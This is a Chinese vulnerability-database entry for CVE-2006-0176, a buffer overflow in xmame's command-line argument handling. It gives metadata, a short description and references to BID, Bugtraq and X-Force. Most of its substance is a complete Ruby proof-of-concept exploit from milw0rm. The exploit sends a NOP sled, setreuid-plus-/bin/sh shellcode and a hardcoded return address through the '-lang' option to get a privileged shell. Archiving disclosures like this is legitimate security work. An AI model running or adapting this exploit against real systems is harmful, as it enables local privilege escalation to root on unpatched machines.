XMame 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109618 漏洞类型 缓冲区溢出
发布时间 2006-01-10 更新时间 2006-01-17
CVE编号 CVE-2006-0176 CNNVD-ID CNNVD-200601-104
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/1412
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-104
|漏洞详情
2006年1月11日之前xmame的src/fileio.c和src/unix/fileio.c中的某些函数存在缓冲区溢出,本地用户可以通过许多操作系统上的长(1)-lang、(2)-ctrlr、(3)-pb或(4)-rec参数,以及通过UbuntuLinux上的长(5)-jdev参数获取特权。
|漏洞EXP
#!/usr/bin/ruby

#
# One of the PoC code for xmame "-lang" options.
# Advisory is base on : http://kerneltrap.org/node/6055
#
# by xwings at mysec dot org
# url : http://www.mysec.org , new website

# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1)
# xmame 0.102 , ./configure && make && make install
#


#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes.
shellcode =     "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+
                "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+
                "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+
                "\x31\xdb\xcd\x80"

vulnpath        = "/usr/games/xmame.x11"
argvopt         = "-lang"

ret = (0xbfffe8da) 
retadd  = ([ret].pack('V'))

nops    = ("\x90" * (1056 - (shellcode.length + retadd.length)))
buffer  = nops+shellcode+retadd

system(vulnpath,argvopt,buffer)

# milw0rm.com [2006-01-10]
|参考资料

来源:BID
名称:16203
链接:http://www.securityfocus.com/bid/16203
来源:BUGTRAQ
名称:20060110mysec.orgSecurityAdvisory:Xmamebufferoverflow,withapossibilityofprivilegeescalation
链接:http://www.securityfocus.com/archive/1/archive/1/421849/100/0/threaded
来源:FULLDISC
名称:20060110mysec.orgSecurityAdvisory:Xmamebufferoverflow,withapossibilityofprivilegeescalation.
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0353.html
来源:XF
名称:xmame-multiple-parameters-bo(24102)
链接:http://xforce.iss.net/xforce/xfdb/24102
来源:x.mame.net
链接:http://x.mame.net/changes-unix.html